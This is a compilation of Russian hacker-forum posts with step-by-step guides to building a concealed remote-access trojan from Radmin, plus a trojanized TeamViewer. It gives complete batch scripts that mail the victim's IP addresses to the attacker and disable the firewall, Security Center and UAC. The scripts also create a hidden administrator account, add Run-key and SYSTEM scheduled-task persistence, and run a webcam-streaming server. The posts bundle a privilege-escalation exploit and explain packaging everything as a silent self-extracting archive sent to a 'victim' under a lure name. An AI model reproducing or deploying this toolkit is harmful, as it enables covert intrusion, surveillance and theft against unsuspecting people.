Категория: Windows: Администрирование
Регистрация: 26.11.2008 Сообщения: 117 Одобрения: 45 Репутация: 1
Сборка от меня для тех кому лень перечитывать сотни страниц фака по этой теме.
Все файлы надо добавить в SFX архив и в свойствах указать выполнить после распаковки install.bat
далее при запуски архива. вы не увидите ничего)Это работа утилиты CMDow которая запускает cmd в скрытом режиме.
что же происходит в данный момент?
архив распаковывает файлы файлы для радмина копирует в windows, файлы почтовой утилиты в windows\system32\. добавляет записи в реестре чтобы радминсервер не было видно,чтоб не ругался виндфаерволл, запускает радминсервер. и отдаёт команду на отсылку ip на ваш почтовый адрес.
после того,как программа выполнится,все распакованные файлы удаляются.
Как пользоваться?
В файле install.bat надо прописать адрес логин и пароль вашей почты,а так же строку с паролем от радмина (по умолчанию пароля нет).далее создаём самораспаковывающийся архив, и кидаем его жертве.
Чтобы не было так паливно,можно прописать в install.bat удаление самого архива и запуск какой-нибудь проги,установщик которой вы добавите в архив,например "Взлом_Вконтакте.exe"
Дописывайте,корректируйте под свои нужды,я лишь выкладываю основу,далее всё зависит от вашей фантазии
P.S. готовый sfx архив не возможно передать по почте,говорит найден вирус)как это обойти,каждый додумывается сам.
http://www.filehoster.ru/files/bx3443
никаких вирусов там нет,архив обычный
Radmin Server 3.5 ML RePack V3 by Alker + Radmin Viewer 3.5 ML RePack by Alker + Radmin Deployment Package
Год/Дата Выпуска. 2012
Автор сборки: Alker
Разрядность. 32bit, 64bit
Язык интерфейса. Русский, английский, украинский
Таблэтка. Не требуется
Системные требования :
Описание. Radmin - это одна из лучших программ удаленного администрирования ПК для платформы Windows, которая позволяет полноценно работать сразу на нескольких удаленных компьютерах с помощью обычного графического интерфейса. Наряду с поддержкой модели безопасности NT и локализацией на любые языки возможна работа в режимах обмена файлами и Telnet, что позволяет рассматривать Radmin как интегрированное решение для удаленного управления организацией любого масштаба.
Портативная версия предоставлена разработчиком, работает без инсталляции на компьютер.
Просьба не распростанять ниже написанное, а если и копипастите, то не забывайте про копираты и ссылку на этот источник.
Прежде всего хочу поблагодарить и сказать большое спасибо onthar и Iindigo за помощь в моих начинаниях.
Эта тема по сути сборка Iindigo http://www.xaker.name/forvb/showthread.php?t=19713 я в свою очередь только добавил RemCam2 (программа для передачи изображения с Веб Камеры и звука по сети) и внес некоторые изменения с отсылкой ip на почту.
И так,для сборки нам понадобятся:Далее устанавливаем Radmin Deployment tool, после установки запускаем Radmin MSI Configurator, указываем ему на скачанный msi пакет сервера Radmin 3.4, задаём настройки, добавляем пользователя и сохраняем. Я задал имя пользователя admin, пароль 123456 и сохранил пакет под именем msupdate.msi
Откладываем этот пакет в сторонку,открываем папку ip и начинаем настройку почтового клиента:
ipconfig /all > localip.txt
realip.exe > realip.txt
ping -n 2 127.0.0.1 > nul
blat.exe -install -server smtp.yandex.ru -port 25 -f логин @yandex.ru -u логин -pw пароль
blat.exe -to логин @yandex.ru -subject "Local IP" -attachi "localip.txt" -body "Locals IP"
blat.exe -to логин @yandex.ru -subject "Real IP" -attachi "realip.txt" -body "Real IP"
del /f /q localip.txt
del /f /q realip.txt
Настраиваем под себя,если будут проблемы с отправкой можно поменять порт 25 на 587(у меня работает на 587)
После того как вы изменили указанные данные на свои, сохраняем файл, закрываем.
Хочу обратить внимание - если вы не знаете какой адрес и порт вашего smtp сервера, зайдите на сайт и поищите в разделе помощи и часто задаваемых вопросов. Наверняка там найдётся эта информация. Если и здесь вас постигла неудача, зарегистрируйте ящик на yandex.ru и заполните поля по аналогии с вышеуказанным примером.
Далее, запускаем программу Bat to Exe Converter, выбираем файл ip.cmd, выставляем переключатель Visibility в Invisible Application, переключатель Working Directory в Temporary Directory. Далее, переходим на вкладку Include, жмем Add и добавляем файлы blat.exe, blat.dll, blat.lib, realip.exe, которые есть у вас в папке ip. Затем жмём Compile и получаем файл ip.exe
Откладываем готовый ip.exe к msupdate.msi.Теперь посмотрим на наш рабочий inst.cmd (есть готовый в скаченном вами архиве):
мануал в честь нового года специально для xaker.name и grabberz.com.
В архиве имеется все необходимое:
AdmDll.dll. raddrv.dll - необходимые, для работы радмина, библиотеки.
svhost.exe - собственно, сам сервер радмина.
1.jpg - просто пикча, которая откроется после запуска билда сервера.
111.bat. 111.reg - в этих файлах записаны все настройки устанавливаемого сервера.
radmin_viewer.exe программа для подключения к серверу radmin.
quickbfc_installer - инстольник программы, для конвертирования батников в *.exe, Quick Batch File Compiller. (и кряк к ней quick.batch.file.compiler.2.1.5.0-patch.exe )
Теперь идем в папку со всем этим добром. рассмотрим файл Source.bat
Видим в нем слуедующий код:
Этот код, его и надо компилировать в экзешник, собственно скопирует файлы из папки "Files "(имеет переменное значение %MYFILES% ) в указанную папку. В моем примере %SYSTEMROOT%\system32\administration_assembly\access_protocol
Дальше рассмотрим файл 111.reg
DisableTrayIcon - если везде нули, то иконка в трее отображается. Если
второй байт - 1, то соответственно не отображается.
Оставляем ноль;
Port - порт, на котором сервер будет ждать соединения;
EnableLogFile - если везде нули, то RAdmin не ведет логи. Если же
01,00,00,00, то сервер ведет лог в файле,указанном в
параметре LogFilePath.Нам лишние следы ни к чему,так
что оставляем отключенным;
EnableEventLog - если второй байт - 1, то действия RAdmin'a
фиксируются в журнале windows и наоборот с нулевым
25.10.10 | Раздел публикации: Radmin
Посетитель: Здравствуйте,
Как скрыть иконку Radmin Server 3 в системном трее?
Консультант: Здравствуйте,
Опция "Не показывать в трее" для иконки Radmin Server по умолчанию не доступна в Radmin 3.x по соображениям безопасности. Специальная версия "No tray icon" программы Radmin Server 3.x предоставляется зарегистрированным пользователям по запросу. В этой версии в настройках сервера есть опция "Не показывать в трее". Обратите внимание, что эта версия не имеет периода тестирования. Активация требуется сразу после инсталляции.
Специальная версия Radmin 3.x защищена от прямого скачивания с сайта. Чтобы получить версию Radmin Server 3.x "No tray icon", пожалуйста заполните эту форму. Получив Ваш запрос, мы дадим Вам доступ и отправим ссылки на необходимые файлы и инструкции по скачиванию.
Эта тема по сути сборка Iindigo http://www.xaker.name/forvb/showthread.php?t=19713 я в свою очередь только добавил RemCam2 (программа для передачи изображения с Веб Камеры и звука по сети) и внес некоторые изменения с отсылкой ip на почту.
И так,для сборки нам понадобятся:
msi пакет сервера Radmin 3.4 (не требует активации, скрывает иконку в трее, не пишется в пуск и установленные программы)
архив для отправки на email
сплойт Windows Task Scheduler Privilege Escalation
пакет утилит Radmin Deployment tool
программа Bat to Exe Converter
архиватор WinRar
сервер RemCam2
Далее устанавливаем Radmin Deployment tool, после установки запускаем Radmin MSI Configurator, указываем ему на скачанный msi пакет сервера Radmin 3.4, задаём настройки, добавляем пользователя и сохраняем. Я задал имя пользователя admin, пароль 123456 и сохранил пакет под именем msupdate.msi
Cсылка на видео по настройке (от Iindigo) http://www.youtube.com/watch?v=hQm5S75GeYM
Откладываем этот пакет в сторонку,открываем папку ip и начинаем настройку почтового клиента:
Цитата:@echo off
ipconfig /all > localip.txt
realip.exe > realip.txt
ping -n 2 127.0.0.1 > nul
blat.exe -install -server smtp.yandex.ru -port 25 -f логин@yandex.ru -u логин -pw пароль
blat.exe -to логин@yandex.ru -subject "Local IP" -attachi "localip.txt" -body "Locals IP"
blat.exe -to логин@yandex.ru -subject "Real IP" -attachi "realip.txt" -body "Real IP"
del /f /q localip.txt
del /f /q realip.txt
Настраиваем под себя,если будут проблемы с отправкой можно поменять порт 25 на 587(у меня работает на 587)
После того как вы изменили указанные данные на свои, сохраняем файл, закрываем.
Хочу обратить внимание - если вы не знаете какой адрес и порт вашего smtp сервера, зайдите на сайт и поищите в разделе помощи и часто задаваемых вопросов. Наверняка там найдётся эта информация. Если и здесь вас постигла неудача, зарегистрируйте ящик на yandex.ru и заполните поля по аналогии с вышеуказанным примером.
Далее, запускаем программу Bat to Exe Converter, выбираем файл ip.cmd, выставляем переключатель Visibility в Invisible Application, переключатель Working Directory в Temporary Directory. Далее, переходим на вкладку Include, жмем Add и добавляем файлы blat.exe, blat.dll, blat.lib, realip.exe, которые есть у вас в папке ip. Затем жмём Compile и получаем файл ip.exe
Cсылка на видео по настройке ip:http://www.youtube.com/watch?v=klAIxkpVB1U
Откладываем готовый ip.exe к msupdate.msi.Теперь посмотрим на наш рабочий inst.cmd (есть готовый в скаченном вами архиве):
Цитата:@echo off
if exist c:\users\nul (goto win7) else goto winxp
ping -n 5 127.0.0.1
start %temp%\poc.exe
ping -n 5 127.0.0.1
net stop wscsvc
sc config wscsvc start= disabled
net stop SharedAccess
sc config SharedAccess start= disabled
sc config TlntSvr start= auto
net start TlntSvr
copy /y "%temp%\ip.exe" "%SYSTEMROOT%/ip.exe"
copy /y "%temp%\cam_server.exe" "%SystemRoot%\cam_server.exe"
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Pol icies\System /v EnableLUA /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t" /v HelpAssistant /t REG_DWORD /d 0 /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v "cam_server.exe" /t REG_SZ /d "%SystemRoot%\cam_server.exe pass=Пароль port=57011" /f
attrib +s +h +r "%SYSTEMROOT%/ip.exe"
attrib +s +h +r "%SYSTEMROOT%/cam_server.exe"
netsh advfirewall firewall add rule name="RealIP" dir=in program="%SYSTEMROOT%\realip.exe" security=notrequired action=allow
netsh advfirewall firewall add rule name="Microsoft Outlook Express" dir=in program="%SYSTEMROOT%\blat.exe" security=notrequired action=allow
netsh firewall add allowedprogram "%SYSTEMROOT%\cam_server.exe" "cam_server" ENABLE
netsh firewall add portopening tcp 57011 all
net user HelpAssistant admin /add
net localgroup Ђ¤¬Ё*Ёбва*в®ал HelpAssistant /add
net user HelpAssistant /active:yes /comment:""зҐв**п §*ЇЁбм ¤«п ЇаҐ¤®бв*ў«Ґ*Ёп Ї®¬®йЁ" /passwordchg:yes
net user HelpAssistant admin
%temp%\msupdate.msi /qn /norestart
start %temp%\ip.exe
ping -n 5 127.0.0.1
attrib +S +H %windir%\system32\rserver30
schtasks /create /tn "security" /sc minute /mo 40 /ru "NT AUTHORITY\SYSTEM" /tr "%SYSTEMROOT%/ip.exe /f
cd %SystemRoot%\
start cam_server.exe pass=Пароль port=57011
net stop rserver3
reg add "HKLM\System\CurrentControlSet\Services\RServe r3" /v "DisplayName" /d "Microsoft Update Provide" /f
reg add "HKLM\System\CurrentControlSet\Services\RServe r3" /v "Description" /d "Update your Windows operation system and check corruption files" /f
net start rserver3
Интервал отправки ip можно подправить здесь:
schtasks /create /tn "security" /sc minute /mo 40 /ru "NT AUTHORITY\SYSTEM" /tr "%SYSTEMROOT%/ip.exe /f
Пароль к RemCam2 здесь:
1.reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v "cam_server.exe" /t REG_SZ /d "%SystemRoot%\cam_server.exe pass=Пароль port=57011" /f
2.start cam_server.exe pass=Пароль port=57011
Сохрянем файл как inst.cmd. Открываем программу Bat to Exe Converter, выбираем файл inst.cmd, выставляем переключатель Visibility в Invisible Application, переключатель Working Directory в Temporary Directory и жмём Compile. Получаем inst.exe.
Кладём этот файл в кучу к msupdate.msi, ip.exe,cam_server.exe и туда же добавляем наш сплойт - poc.exe.
В итоге, у нас получилось 5 файлов
1)msupdate.msi - специальный пакет radmin server 3.4
2)ip.exe - программа которая возьмёт ip компьютера и отправит нам их на мыло
3)inst.exe - основной инсталлятор
4)poc.exe - сплойт Windows Task Scheduler Privilege Escalation
5)cam_server.exe-сервер RemCam2
Все 5 файлов объединяем в один самораспаковывающийся архив. Ставим архиватор WinRar. Затем, выделяем файлы и создаем архив. Даём архиву название, к примеру msupdate. В настройках архива ставим галочки напротив "Создать "SFX-архив" и "Протестировать файлы после упаковки". Уровень сжатия ставим максимальный. Далее переходим на вкладку "Дополнительно" и открываем "Параметры SFX".
Вкладка "Общие":
Путь для распаковки - вводим %temp%
Выполнить после распаковки - вводим %temp%\inst.exe
Вкладка "Режимы":
Режим вывода информации - ставим в "Скрыть всё"
Вкладка "Обновление":
Режим перезаписи - ставим в "Перезаписывать все файлы без запроса"
Жмём "Ок" и ещё раз "Ок" для создания архива.
Скрытый Radmin 3 не виден в трее, меню пуск и списке установленных программ.
Скрытый Radmin 3 должен быть установлен на удаленных компьютерах, к которым Вы собираетесь подключиться. Он всегда запускается в качестве сервиса и автоматически загружается при запуске Windows в скрытом режиме.
Radmin известен своими высочайшими стандартами безопасности. При попытке подключения к удаленному компьютеру, Radmin Server производит безопасную аутентификацию пользователя при помощи пароля. Программа проверяет наличие у пользователей прав доступа и настройки IP-фильтрации. Все данные при передаче по сети надежно защищены по стандарту AES.
При подключении серверный модуль Radmin обеспечивает полный эффект присутствия за экраном удаленного компьютера. Radmin 3 включает в себя новую технологиюDirectScreenTransfer™ на базе Radmin Mirror driver. Данная разработка позволяет Radmin Server считывать данные с экрана удаленного компьютера в обход видеоконтроллеров, снижая тем самым нагрузку на процессор. Radmin использует интеллектуальный алгоритм, позволяющий считывать обновления данных. Данная технология не только обеспечивает возможность максимального увеличения скорости обновления экрана, но и снижает расход сетевого трафика. Это особенно важно, когда подключение к удаленному компьютеру осуществляется при работе с медленным Интернет-соединением или соединением через модем.
Данная часть Radmin работает также в качестве сервера для поддержки возможностей текстового и голосового чата. В системе безопасности используются те же алгоритмы безопасности и аутентификации, что и в режиме Full Control.
Radmin Server поддерживает многие возможности, среди которых точная передача формы и анимации курсора, корректная передача изображения с нескольких мониторов, и многое другое.
Виден процесс в диспетчере задач
Устанавливается как обычный радмин
В процессе установке необходимо выставить права доступа, по умолчанию логин: adm пароль: adm
Далее ведёт себя тихо и незаметно
Скрытый Team Viewer (аналог Radmin)
Обработанный Team Viewer*
*Для тех кто не знает: программа для удалённого управления др. компьютером. (Также скачивание/загрузка файлов с уд.комп.) Подключение идёт не через IP, а через ID, который выдаётся при запсуке программы. Файл, который вы тут скачаете это обработанная версия, которая запускается без ведома админа!
Суть как всегда проста, кидаем жертве файлик и млеем от проделанной работы.
1. Регаете хост, льёте туда stat.php, там же создаёте stat.txt (про cmod не забудте)
2. Запускаете config.bat, вписываете свой хост, далее жмёте на build.bat и в папке появляются две dll-ки (ts.dll и ts1.dll), каждая для своего метода отправки (post, get).
3. Джойните (+ пакуете) TeamViewer.exe + TV.dll + (ts.dll или ts1.dll) и отправляете "по адресу".
4. Идёте на [Ссылки видны только зарегистрированным пользователям. Зарегистрироваться ] и там будет что-то вроде этого:
Kod: 391053173/9313 Date and Time:6 September, 2009, 1:02 am IP: 78.181.222.1
где 391053173 - код, и 9313- пароль
5. Открываете сам вьювер, вписываете код и если есть коннект вьювер попросит и пароль.
[+]. работает пошустрее радмина (имхо)
[- ]: большой вес (чуть более метра)
В архиве видео, прога, readme [Ссылки видны только зарегистрированным пользователям. Зарегистрироваться ]
Обработка by Salamandra.